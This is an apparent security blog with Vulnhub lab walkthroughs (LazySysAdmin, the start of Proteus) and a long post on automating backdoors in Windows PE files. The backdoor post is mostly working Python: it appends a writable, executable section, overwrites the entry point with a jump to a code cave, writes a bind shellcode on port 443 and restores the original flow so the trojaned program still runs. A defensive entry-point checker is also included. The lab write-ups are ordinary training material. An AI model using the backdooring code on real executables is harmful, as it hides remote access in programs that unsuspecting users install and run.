<b>Gu!d3 t0 0wn4g3</b> (blog by Angkan, http://www.blogger.com/profile/18370393056318837500)<br />
<b>My Tryst with Exploitation</b> (2018-01-29)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">Hello Everyone! n1ghtcr4wl3r here...<br />
<br />
I have started preparing for the Offensive Security Certified Expert (OSCE) certification, and this post describes how I have started honing my binary exploitation skills.<br />
<br />
<a href="https://tulpa-security.com/">Tulpa</a> has been a great help in commencing this journey, and so have <a href="https://www.securitysift.com/">Mike</a> and <a href="https://www.corelan.be/">corelanc0d3r</a> :)<br />
<br />
This post shall be incremental: I will describe my journey while exploiting a piece of software called <a href="https://github.com/stephenbradshaw/vulnserver">vulnserver</a>.<br />
<br />
I will keep adding more content on this post as time goes by.<br />
<br />
Until then see you next time!</div>
<b>0wn!ng LazySysAdmin: 1</b> (2017-11-12)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Hi,<br />
<br />
In this post I am going to write about how I owned the LazySysAdmin: 1 machine, which is hosted on Vulnhub.<br />
<br />
As usual, I start with an arp-scan and discover the target IP address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-dR2du9-aGSU/WgiT5C358gI/AAAAAAAAKqQ/QOqYWRqEf5MrE1tnUl_7lophJfvi4GZHgCLcBGAs/s1600/arpScan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="147" data-original-width="756" height="122" src="https://3.bp.blogspot.com/-dR2du9-aGSU/WgiT5C358gI/AAAAAAAAKqQ/QOqYWRqEf5MrE1tnUl_7lophJfvi4GZHgCLcBGAs/s640/arpScan.PNG" width="640" /></a></div>
<br />
<br />
Next comes the port scan.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-7n2JJKqdKHc/WgiUTDUoToI/AAAAAAAAKqU/PTPtVC1H5ycc0tiBciQdKiF_SgZulmZ_QCLcBGAs/s1600/nmapScan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="537" height="424" src="https://4.bp.blogspot.com/-7n2JJKqdKHc/WgiUTDUoToI/AAAAAAAAKqU/PTPtVC1H5ycc0tiBciQdKiF_SgZulmZ_QCLcBGAs/s640/nmapScan.PNG" width="640" /></a></div>
<br />
I decided to first enumerate the webpage:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-MnFKeDvSS4k/WgiUftezN-I/AAAAAAAAKqc/Yi3xP54VTRU2-w9ZvJ3m1sNZOVXPTjrXgCLcBGAs/s1600/mainPage.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1600" height="214" src="https://2.bp.blogspot.com/-MnFKeDvSS4k/WgiUftezN-I/AAAAAAAAKqc/Yi3xP54VTRU2-w9ZvJ3m1sNZOVXPTjrXgCLcBGAs/s640/mainPage.PNG" width="640" /></a></div>
<br />
<br />
Enumeration reveals that WordPress and phpMyAdmin are running.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-zpxk1naJEEs/WgiUvJruQOI/AAAAAAAAKqg/RN6JQKR5kkokqygEm6fsc8EXGtV98frQQCLcBGAs/s1600/wordPress.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="753" data-original-width="1143" height="420" src="https://1.bp.blogspot.com/-zpxk1naJEEs/WgiUvJruQOI/AAAAAAAAKqg/RN6JQKR5kkokqygEm6fsc8EXGtV98frQQCLcBGAs/s640/wordPress.PNG" width="640" /></a></div>
<br />
<br />
It is clear that the name of the admin is "togie", which may come in useful later.<br />
<br />
Next, I searched through the website; there are files with directory listing, etc., but I hit a roadblock on the web service.<br />
<br />
I decided to look at the SMB ports, 139 and 445.<br />
<br />
Using smbclient, I checked whether null sessions are enabled, and my guess was correct.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0YTZAT2Y3zM/WgiVURGt6tI/AAAAAAAAKqs/5guCDG-m2ysw6ZLJn48YXuTuIQHazTa9wCLcBGAs/s1600/smbDir.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="371" data-original-width="690" height="344" src="https://2.bp.blogspot.com/-0YTZAT2Y3zM/WgiVURGt6tI/AAAAAAAAKqs/5guCDG-m2ysw6ZLJn48YXuTuIQHazTa9wCLcBGAs/s640/smbDir.PNG" width="640" /></a></div>
<br />
There are some interesting files here.<br />
<br />
After further digging I have two pieces of information:<br />
<br />
1. In wp-config, the DB username and password are present.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-DxIJLH_J4ag/WgiVo9opQYI/AAAAAAAAKqw/5ARAkZRRyP4EsT_niNfWlHXZ7Tb1_Bb0wCLcBGAs/s1600/mysqlPasswd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="636" height="600" src="https://4.bp.blogspot.com/-DxIJLH_J4ag/WgiVo9opQYI/AAAAAAAAKqw/5ARAkZRRyP4EsT_niNfWlHXZ7Tb1_Bb0wCLcBGAs/s640/mysqlPasswd.PNG" width="640" /></a></div>
<br />
2. The file deets.txt has a clue:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-7XrJYEwNc4g/WgiV2HIcExI/AAAAAAAAKq4/y2uQl7-XmzU-rVG_5kYS8cWSJmXaKMCIwCLcBGAs/s1600/sshPassword.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="120" data-original-width="765" height="100" src="https://2.bp.blogspot.com/-7XrJYEwNc4g/WgiV2HIcExI/AAAAAAAAKq4/y2uQl7-XmzU-rVG_5kYS8cWSJmXaKMCIwCLcBGAs/s640/sshPassword.PNG" width="640" /></a></div>
<br />
Now, with username "<b>Admin</b>" and password "<b>TogieMYSQL12345^^</b>" I can log in to phpMyAdmin, as its password is the same as the MySQL password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Pv_tk6W5jhg/WgiWbxY2wuI/AAAAAAAAKrA/2EMyNREbP_IqjIaezxJpIDb4ComAg-ZWACLcBGAs/s1600/phpMyAdminLogin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="697" data-original-width="885" height="504" src="https://2.bp.blogspot.com/-Pv_tk6W5jhg/WgiWbxY2wuI/AAAAAAAAKrA/2EMyNREbP_IqjIaezxJpIDb4ComAg-ZWACLcBGAs/s640/phpMyAdminLogin.PNG" width="640" /></a></div>
<br />
It's a <b>lazyAdmin</b> machine, so maybe there is password re-use?<br />
<br />
I tried the same password for the wp-admin login and could log in:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-KsvBSqeT6Go/WgiWqknX0vI/AAAAAAAAKrE/m3yFLXpkq30_7hm4kZH8nhyronSb1n66wCLcBGAs/s1600/wordpressLogin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="593" data-original-width="813" height="466" src="https://3.bp.blogspot.com/-KsvBSqeT6Go/WgiWqknX0vI/AAAAAAAAKrE/m3yFLXpkq30_7hm4kZH8nhyronSb1n66wCLcBGAs/s640/wordpressLogin.PNG" width="640" /></a></div>
<br />
Given the MySQL password "<b>TogieMYSQL12345^^</b>", I tried "<b>TogieSSH12345^^</b>" for the SSH service, but it failed.<br />
<br />
I remembered the deets.txt that I was able to get from the SMB share.<br />
<br />
With username "<b>togie</b>" and password "<b>12345</b>" I got an SSH shell, but it is a restricted bash.<br />
<br />
So I tweaked my SSH login to escape rbash:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-xu9yA3IkgKw/WgiXixqmneI/AAAAAAAAKrU/3rSrRTioxTU1tQB92YBxTd-VIGynW6UfwCLcBGAs/s1600/gainAccessAndRoot.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1135" height="252" src="https://2.bp.blogspot.com/-xu9yA3IkgKw/WgiXixqmneI/AAAAAAAAKrU/3rSrRTioxTU1tQB92YBxTd-VIGynW6UfwCLcBGAs/s640/gainAccessAndRoot.PNG" width="640" /></a></div>
<br />
As you can see, user "<b>togie</b>" is in the sudo group, so a sudo -i makes us the root user.<br />
<br />
Going for the flag:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8XJiGO_r8jc/WgiX2ljr-qI/AAAAAAAAKrc/9M3lEhncL74bZGXNWzLnXLn952hfot9FQCLcBGAs/s1600/proof.txt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="422" height="640" src="https://4.bp.blogspot.com/-8XJiGO_r8jc/WgiX2ljr-qI/AAAAAAAAKrc/9M3lEhncL74bZGXNWzLnXLn952hfot9FQCLcBGAs/s640/proof.txt.PNG" width="612" /></a></div>
<br />
<br />
Conclusion:<br />
<br />
This boot2root was good but could have been a little more challenging, especially the privilege escalation.<br />
<br />
Thanks to the author, Togie Mcdogie, who put in the effort to build the machine, and to Vulnhub for hosting it.<br />
<br />
-n1ghtcr4wl3r</div>
<b>Automating backdoor creation for PE files</b> (2017-11-02)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">Hello,<br />
<br />
In this post I shall write about my experiences and attempt at automating the process of backdoor creation for Windows PE (Portable Executable) files.<br />
More than a short and quick success story, it has been many failures and frustrations, but I made some commendable progress by trying harder.<br />
<br />
<b>I would like to point out that I am not publishing the entire code but giving you an outline as to <i>"how to do it"</i>, with short code snippets included.</b><br />
<br />
The post highlights my journey: where I faced the most issues, where I spent the most time, and where I could have done better.<br />
<br />
The rough idea behind a backdoor is that we redirect the code flow at the entry point of a PE file to a clean section within the PE file where the shellcode is located; the shellcode does its work and then hands control back to the original code of the file.<br />
<br />
But we need to discuss the above statement in more detail.<br />
<br />
<b>[+] Getting the entry point of a PE & making a clean section within PE file.</b><br />
<br />
<br />
When loading a program in a debugger (at least Immunity or OllyDbg), you can see that the program stops just before the main function and asks whether we want to run it further.<br />
<br />
Well, that's the entry point. It is this address we need to find, and since this post is about automating the entire process, how did I go about doing it?<br />
<br />
Well, when I talk about automating it, I mean pythonizing it (because that's the best automation language I know).<br />
And Python comes with a bunch of modules that you can import.<br />
The "pefile" module comes to the rescue!<br />
<br />
Reading more about the PE file structure, we learn that the entry point can be found by static analysis (i.e. without running the PE file), as the PE header contains a field which points to it.<br />
<br />
Inside the PE OPTIONAL_HEADER we find the attribute "AddressOfEntryPoint".<br />
<br />
And in language of Python:<br />
<br />
<code><b><br />
import pefile<br />
<br />
pe = pefile.PE("tempCave.exe")<br />
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint #RVA of the entry point<br />
</b></code><br />
<br />
<br />
However, if you compare the value of ep to the actual address seen in the debugger, you will see that there is an offset. What is this offset?<br />
It turns out that the value of ep is an RVA (Relative Virtual Address), but relative to what?<br />
<br />
PE files have an ImageBase address which, when added to the RVA, gives the actual virtual address that we see in the debugger.<br />
Hence I need to do this:<br />
<br />
<code><b><br />
ep_ava = ep+pe.OPTIONAL_HEADER.ImageBase #actual virtual address of the entry point<br />
</b></code><br />
<br />
Now I have the actual entry point address.<br />
Next, I need to get the assembly of the instructions located right at the entry point.<br />
<br />
In this case, another Python module comes to the rescue, called pydasm!<br />
<br />
After some research on the web, I was able to locate sensible code whose logic extracted exactly what I required.<br />
<br />
<code><b><br />
import pydasm<br />
<br />
#bytes starting at the entry point; the post does not show how data was filled, one way is:<br />
data = pe.get_memory_mapped_image()[ep:ep+64]<br />
offset = 0<br />
save_instr = [] #array to save the instructions<br />
d = {} #dictionary mapping the address of each instruction to the instruction itself<br />
<br />
while offset < len(data):<br />
<span style="white-space: pre;"> </span>i = pydasm.get_instruction(data[offset:], pydasm.MODE_32)<br />
<span style="white-space: pre;"> </span>if i is None: #undecodable byte, stop rather than loop forever<br />
<span style="white-space: pre;"> </span><span style="white-space: pre;"> </span>break<br />
<span style="white-space: pre;"> </span>print "i: " + str(i)<br />
<span style="white-space: pre;"> </span>instr = pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)<br />
<span style="white-space: pre;"> </span>save_instr.append(instr)<br />
<span style="white-space: pre;"> </span>interim = str(hex(ep_ava+offset))<br />
<span style="white-space: pre;"> </span>d[interim] = instr<br />
<span style="white-space: pre;"> </span>offset += i.length<br />
</b></code><br />
<br />
The offset variable sets the point from which we read the instructions, and MODE_32 tells pydasm how to decode them.<br />
For rendering the instructions, get_instruction_string is given the syntax format we want (FORMAT_INTEL) and the address of the instruction, so that relative targets are printed correctly.<br />
<br />
So, right now I have completed two steps towards automation (getting the entry point and getting the initial instructions).<br />
<br />
Next up are two more objectives:<br />
<b><br />
[+] Setting up the code cave.<br />
[+] Overwriting the initial instructions to jump to the code cave.<br />
</b><br />
<br />
For setting up the code cave, I had to search for a long time on the web (struggle!).<br />
Mostly I found that only limited editing of a PE file can be done with the pefile module of Python.<br />
And then I found this hidden gem in a reddit thread:<br />
https://www.reddit.com/r/ReverseEngineering/comments/1jpghd/addingremoving_sections_with_python/<br />
<br />
It seems there is indeed hope for editing PE files to add a new section!<br />
<br />
I downloaded the Python module into my Python directory and was able to get its benefits:<br />
<code><b><br />
import SectionDoubleP #module from the reddit thread above, placed on the Python path<br />
<br />
sections = SectionDoubleP.SectionDoubleP(pe)<br />
sections.push_back(VirtualSize=0x00001000, RawSize=0x00001000, Characteristics=0xE0000020)<br />
</b></code><br />
<br />
In this code, I first create a section object and then define the attributes of the new section (let me remind you here that the section needs to be "writable" and "executable").<br />
<br />
Hence the characteristics flag value is defined as <b>"0xE0000020"</b>, the PE equivalent of 777 (read/write/execute) permissions.<br />
The VirtualSize attribute tells how large (in bytes) the section should be, and push_back appends this new section after all the existing sections of the PE file.<br />
For example, if my PE file starts at <b>0x04000000</b>, then my new section would start at <b>0x40001000</b> in actual virtual address terms.<br />
<br />
Next I need to overwrite the original instructions with my "hijacking" instruction.<br />
It needs to redirect execution to the start of our newly made code cave.<br />
<br />
Here I prefer to use a jump (<i>why not a call? Because I hate meddling with the stack, especially when I am doing static file modification and have no idea what values the registers will hold!</i>)<br />
<br />
The trick with jmp <address>, which I did not know, was that this <address> is always a relative address.<br />
Relative to what?<br />
<br />
Well, the <code><b><address> = [dest. address] - [start address] - 5</b></code><br />
dest. address = start address of the new PE section that we made<br />
start address = address where the jmp is written (the entry point)<br />
-5 = the size of the jmp instruction itself, since the displacement is relative to the address of the next instruction.<br />
<br />
Hence a rough piece of code I came up with was this:<br />
<code><b><br />
import struct<br />
<br />
#displacement of a near jmp (E9) is relative to the end of the 5-byte instruction<br />
jmp_address = int(dest_address,16) - int(start_address,16) - 5<br />
#pack as a signed 32-bit value in little endian byte order for Intel<br />
jmp_bytes = struct.pack('<i', jmp_address)<br />
jmp_opcodes = ["%02x" % ord(b) for b in jmp_bytes] #list of the four displacement bytes as hex strings<br />
</b></code><br />
All right, now we just need to prepend the jmp opcode "\xe9" to the displacement bytes generated above.<br />
<br />
So we are going to write the <b>"\xe9" + "jmp_address"</b> opcodes at the entry point.<br />
While writing to the file, we remember to save the actual legitimate instructions so that we can replay them later.<br />
<br />
Code to rewrite the entry point instructions:<br />
<code><b><br />
print "\t[+]overwriting entrypoint with a jump to code cave"<br />
ep_hex = int(ep_hex,16) #entry point RVA as an integer<br />
for instruction in jmp_opcodes: #"e9" followed by the four displacement bytes<br />
<span style="white-space: pre;"> </span>#print "injecting value: " + instruction + " injecting at: " + str(ep_hex)<br />
<span style="white-space: pre;"> </span>instruction = int(instruction,16)<br />
<span style="white-space: pre;"> </span>status = pe.set_bytes_at_rva(ep_hex,chr(instruction))<br />
<span style="white-space: pre;"> </span>if(status is False):<br />
<span style="white-space: pre;"> </span><span style="white-space: pre;"> </span>print "[!]entry point hijacking failed..."<br />
<span style="white-space: pre;"> </span>ep_hex = ep_hex + 1<br />
</b></code><br />
Next, once the entry point has been overwritten with jmp <new_PE_section_address>, we can write the instructions in the new clean PE section: first saving the registers and flags (pushad, pushfd) and then writing the shellcode.<br />
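A defender-side check for the static layout described so far, written as an added example (not code from the post): using only the standard library it parses the PE32 headers, finds the section holding AddressOfEntryPoint, decodes a leading E9 jmp with the same rel32 relationship as the formula above (target = start + 5 + displacement), and flags a jump out of the entry section into a writable-and-executable last section. The PE image it inspects is a constructed minimal file built by build_sample_pe, so the section names, addresses and bytes are assumptions, not values from the post.

```python
import struct

# Section characteristic bits from the PE specification; 0xE0000020 is the value the post uses.
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
RWX_CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


def parse_pe(data):
    """Read the PE32 fields we need: AddressOfEntryPoint, ImageBase and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # the post's 'ep'
    image_base = struct.unpack_from("<I", data, opt + 28)[0]  # ep + ImageBase = ep_ava
    sections = []
    for n in range(num_sections):
        hdr = opt + opt_size + 40 * n
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, hdr)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vsize": vsize,
                         "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return {"entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def section_for_rva(pe, rva):
    """The section whose virtual range contains rva, or None."""
    for sec in pe["sections"]:
        if sec["vaddr"] <= rva < sec["vaddr"] + max(sec["vsize"], sec["rawsize"]):
            return sec
    return None


def check_entry_point(data):
    """Findings about the entry point. A jmp out of its own section into a writable+executable
    last section is the layout the post builds; a jmp that stays inside its section is normal."""
    pe = parse_pe(data)
    ep_rva, last = pe["entry_rva"], pe["sections"][-1]
    ep_sec = section_for_rva(pe, ep_rva)
    if ep_sec is None:
        return ["entry point lies outside every section"]
    findings = []
    off = ep_rva - ep_sec["vaddr"] + ep_sec["rawptr"]  # RVA -> file offset of the first instruction
    if off + 5 <= len(data) and data[off] == 0xE9:
        # E9 rel32 is relative to the end of the 5-byte instruction, so target = ep + 5 + rel;
        # this is the inverse of the post's  address = dest - start - 5.
        rel = struct.unpack_from("<i", data, off + 1)[0]
        tgt_rva = ep_rva + 5 + rel
        tgt = section_for_rva(pe, tgt_rva)
        if tgt is not None and tgt is not ep_sec:
            findings.append("entry point jmps out of %s into %s (VA 0x%08x)"
                            % (ep_sec["name"], tgt["name"], pe["image_base"] + tgt_rva))
            if tgt["chars"] & RWX_CODE == RWX_CODE:
                findings.append("jmp target %s is writable and executable (0x%08x)"
                                % (tgt["name"], tgt["chars"]))
            if tgt is last:
                findings.append("jmp target is the last section, typical of an appended code cave")
    if ep_sec["chars"] & IMAGE_SCN_MEM_WRITE:
        findings.append("entry point section %s is writable" % ep_sec["name"])
    return findings


def build_sample_pe(backdoored):
    """Constructed minimal PE32 image (test data, not a real program). With backdoored=True a
    .robed section with characteristics 0xE0000020 is appended and the entry point is
    rewritten to jmp to it, which is the static result of the steps described above."""
    file_align, image_base, hdr_size = 0x200, 0x400000, 0x400
    text_rva, cave_rva = 0x1000, 0x2000
    sections = [(b".text", text_rva, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)]
    # push ebp; mov ebp, esp; nop x4; ret  -- stands in for the original entry code
    text = bytearray(b"\x55\x89\xe5\x90\x90\x90\x90\xc3").ljust(file_align, b"\0")
    if backdoored:
        sections.append((b".robed", cave_rva, RWX_CODE))
        text[0:5] = b"\xe9" + struct.pack("<i", cave_rva - text_rva - 5)  # the post's formula
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, text_rva)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)           # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)  # SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 60, hdr_size)             # SizeOfHeaders
    sec_hdrs, body, raw_ptr = b"", b"", hdr_size
    for name, rva, chars in sections:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, file_align, rva, file_align, raw_ptr,
                                0, 0, 0, 0, chars)
        body += bytes(text) if name == b".text" else bytes(file_align)  # cave content left empty
        raw_ptr += file_align
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec_hdrs).ljust(hdr_size, b"\0")
    return headers + body
```

Running check_entry_point over build_sample_pe(True) reports the jump into .robed, its RWX characteristics and its position as the last section; the clean image produces no findings.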
<br />
Here I used an alphanumeric bind shellcode that binds to port 443.<br />
Now, I know it's not true automation to have a hardcoded shellcode, but maybe that's for version 1.1 (as an improvement?).<br />
<br />
<b>shellcode = "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"<br />
</b><br />
<div><br />
</div><div>I would like to remind here that the above shellcode has been backdoorified (in the sense that there is a wait for infinite time when a value of -1 is pushed onto the stack)</div><div><br />
</div><div>I have changed the opcodes above such that the bind works without hampering the execution of the original program (which we are backdooring).</div><div><br />
</div><div>So, the shellcode is then written cleanly using the following code:</div><div><br />
<code><b><br />
shellcode_len = len(shellcode)<br />
write_code = []<br />
<br />
#making instruction list<br />
for i in range(0,shellcode_len,2):<br />
<span style="white-space: pre;"> </span>write_code.append(shellcode[i:i+2])<br />
<br />
number_of_instructions = len(write_code)<br />
<br />
#setting EIP to the next memory location to write [robed = name of new PE section that I made]<br />
robed_VA = robed_VA + 1<br />
<br />
#writing shellcode<br />
count = 0<br />
while(number_of_instructions > 0):<br />
<span style="white-space: pre;"> </span>pe.set_bytes_at_rva(robed_VA, chr(0x9c))<br />
<span style="white-space: pre;"> </span>shellcode_instruction = "0x" + write_code[count]<br />
<span style="white-space: pre;"> </span>shellcode_instruction = int(shellcode_instruction, 16)<br />
<span style="white-space: pre;"> </span>status = pe.set_bytes_at_rva(robed_VA,chr(shellcode_instruction))<br />
#<span style="white-space: pre;"> </span>print "injecting value: " + str(hex(shellcode_instruction)) + " injecting at: " + str(hex(robed_VA))<br />
#<span style="white-space: pre;"> </span>print status<br />
<span style="white-space: pre;"> </span>robed_VA = robed_VA + 1<span style="white-space: pre;"> </span>#increment to next instruction pointer<br />
<span style="white-space: pre;"> </span>count = count + 1<span style="white-space: pre;"> </span>#increment the write_code counter to write the next instruction of shellcode<br />
#<span style="white-space: pre;"> </span>if count > 10:<br />
#<span style="white-space: pre;"> </span><span style="white-space: pre;"> </span>break<br />
<span style="white-space: pre;"> </span>number_of_instructions = number_of_instructions - 1 #decrement number_of_instructions until zero to stop while loop<br />
print "[+]Shellcode successfully written"<br />
</b></code></div><div>
</div><div>We will now proceed to save the file.</div><div><br />
</div><div>#code</div><div><code><b><br />
pe.write(filename="tmp.exe") #save the modified PE to a temporary file<br />
</b></code></div><div><br />
</div><div>Now, this saved PE file has the entry point hijacked, the registers and flags saved (pushad, pushfd), and the shellcode written at the hijacked address.</div><div><br />
</div><div>We have now three more points to cover:</div><div><b><br />
[+] Post shellcode execution, adjust ESP to the initial ESP<br />
[+] Pop the initial registers and flags (popfd, popad, since the stack is a FILO structure)<br />
[+] Write back the initial instructions which were saved, so that the actual program runs normally</b></div><div><br />
</div><div>Adjusting the ESP was the biggest hindrance, and I spent three days fighting over how to adjust ESP to the right value while doing static file analysis and editing.</div><div><br />
</div><div>It quickly became clear that to automate this step I would need some extra juice!</div><div><br />
</div><div><br />
</div><div><b><br />
[*] Here comes dynamic analysis via Python</b></div><div><br />
</div><div>Immunity could not be automated unless I explicitly run a PyCommand, and I could not find any suitable way to run PyCommands from a Python script without running Immunity.</div><div>For OllyDbg I could not find any Python integration.</div><div><br />
</div><div>Running through multiple blogs and asking questions here and there (no answers!), I came upon a thread which talked about the <b>pykd Python module and WinDbg integration.</b></div><div><br />
</div><div>But I must say, pykd is documented mostly in Russian, and I had to read for quite a while to get a hold of it for my automation needs.</div><div><br />
</div><div>And here comes the code which made adjusting ESP successful.</div><div><b>[+] Saving the initial ESP:</b></div><div><code><b><br />
import pykd<br />
<br />
#fileName = path of the original (not yet backdoored) executable<br />
pykd.startProcess(fileName)<br />
print "[+]setting entry point breakpoint"<br />
pykd.dbgCommand("bp $exentry")<br />
print "[+]stepping into breakpoint"<br />
pykd.dbgCommand("g")<br />
print "[+]Fetching address of esp @entryPoint"<br />
#print "[+]" + str(pykd.dbgCommand("r esp"))<br />
initial_esp = str(pykd.dbgCommand("r esp")) #output has the form "esp=<hex value>"<br />
#print type(initial_esp)<br />
initial_esp = initial_esp.split("=")[1].strip()<br />
#print "splitted..." + initial_esp<br />
initial_esp = "0x"+initial_esp<br />
print "[+]Initial ESP: " + initial_esp<br />
initial_esp = int(initial_esp,16)<br />
</b></code></div><div><br />
</div><div><b><br />
[+] Getting the final ESP (a breakpoint where the shellcode ends, which can be calculated from the length of the shellcode)</b></div><div><br />
</div><div><code><b><br />
print "[+]Starting the temporary executable which we had saved earlier"<br />
pykd.startProcess("tmp.exe")<br />
print "\t[+]setting final breakpoint"<br />
#final_eip = address where the shellcode ends (cave address + shellcode length), computed earlier<br />
bpCmd = "bp " + final_eip<br />
pykd.dbgCommand(bpCmd)<br />
print "\t[+]stepping into breakpoint"<br />
print "\t[+]make a connection to the host at port 443"<br />
print "\t[+]waiting..."<br />
pykd.dbgCommand("g")<br />
print "\t[+]Fetching address of esp @entryPoint"<br />
print "\t[+]" + str(pykd.dbgCommand("r esp")).replace("=",":")<br />
final_esp = str(pykd.dbgCommand("r esp"))<br />
print final_esp<br />
print "[+]processing esp..."<br />
final_esp = final_esp.split("=")[1].strip()<br />
final_esp = "0x"+final_esp<br />
final_esp = int(final_esp,16)<br />
print "\t[+]Final esp: " + str(final_esp)<br />
</b></code></div><div>
<br />
</div><div>And that got me out of the seemingly tight spot of how to calculate the ESP adjustment.</div><div><br />
</div><div>Next up is simple: add esp, <esp address difference></div><div>and then write popfd, popad.</div><div><br />
</div><div>Now for replaying the initial instructions, remember we saved them?</div><div><br />
</div><div>We will now write these just after the popad (which is the last instruction).</div><div>Replaying the original instructions could be a little complicated; however, since the address was saved for each initial instruction, I was able to write the original push instruction and then the address of the original call instruction to redirect to the original code flow.</div><div><br />
</div><div>But this part certainly needs a more generic approach on my part.</div><div><br />
</div><div>With this, I shall end this long post.</div><div>Though many of you might find this redundant, and the code/logic may be hugely un-optimized, I wanted to share how I did it on my path of struggle (<b><i>call it blabbering :P</i></b>).</div><br />
<b>- nightcr4wl3r</b></div>
<b>Proteus Pwn4g3</b> (2017-07-01)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;">Hi Everyone,</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Over this blogpost, I shall write about how I cracked a recently hosted challenge on vulnhub named "Proteus".</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Looking at the machine description over Vulnhub:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://2.bp.blogspot.com/-45BfFiUfSJc/WVeQ5yMJt_I/AAAAAAAAKew/7cNYe0I9xDAaztcBZaO4_k2OgaoXFBhlwCK4BGAYYCw/s1600/proteus.PNG" imageanchor="1"><img border="0" height="209" src="https://2.bp.blogspot.com/-45BfFiUfSJc/WVeQ5yMJt_I/AAAAAAAAKew/7cNYe0I9xDAaztcBZaO4_k2OgaoXFBhlwCK4BGAYYCw/s640/proteus.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The machine simulates an environment where you can upload executable files, and it performs malware analysis on them.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I downloaded the OVA and set up my Kali and the vulnerable machine on the same network.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">First and foremost, network discovery:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://1.bp.blogspot.com/-iv5XHu2XSpE/WVeSHFafmpI/AAAAAAAAKe8/Yabv6P7Tp-AyH-PIXQJUM8yaSUx5P0sKgCK4BGAYYCw/s1600/net_disco.png" imageanchor="1"><img border="0" height="314" src="https://1.bp.blogspot.com/-iv5XHu2XSpE/WVeSHFafmpI/AAAAAAAAKe8/Yabv6P7Tp-AyH-PIXQJUM8yaSUx5P0sKgCK4BGAYYCw/s640/net_disco.png" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So the IP I shall be targeting is 192.168.137.250</span><br />
<span style="background-color: white;"><br /></span>
